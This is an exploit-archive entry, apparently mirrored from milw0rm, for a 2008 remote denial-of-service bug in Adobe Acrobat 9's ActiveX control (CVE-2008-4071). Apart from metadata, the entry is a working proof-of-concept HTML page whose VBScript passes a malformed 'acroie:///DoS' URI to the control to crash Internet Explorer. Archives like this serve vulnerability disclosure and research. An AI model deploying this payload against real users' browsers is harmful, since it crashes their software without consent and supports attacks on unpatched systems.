[] NeoSense
E X P L O I T S
title author type platform port cve id

Adobe Acrobat 9 - ActiveX Remote Denial of Service

Author: Jeremy Brown
type: dos
platform: windows
port: 
date_added: 2008-09-10 
date_updated:  
verified: 1 
codes: OSVDB-48422;CVE-2008-4071 
tags: 
aliases:  
screenshot_url:  
application_url: 
<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
     Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
     I can't seem to reproduce this on XP! Oh well.
     Of course the most popular app for reading pdfs is SfS/SfI :)
     Basically it will crash with any uri that adobe doesn't like.
     Also interesting: try with file:///DoS and look in bottom left area -->

<html><body>

<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>

arg1="acroie:///DoS"
target.src = arg1

</script>
</body></html>

# milw0rm.com [2008-09-11]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.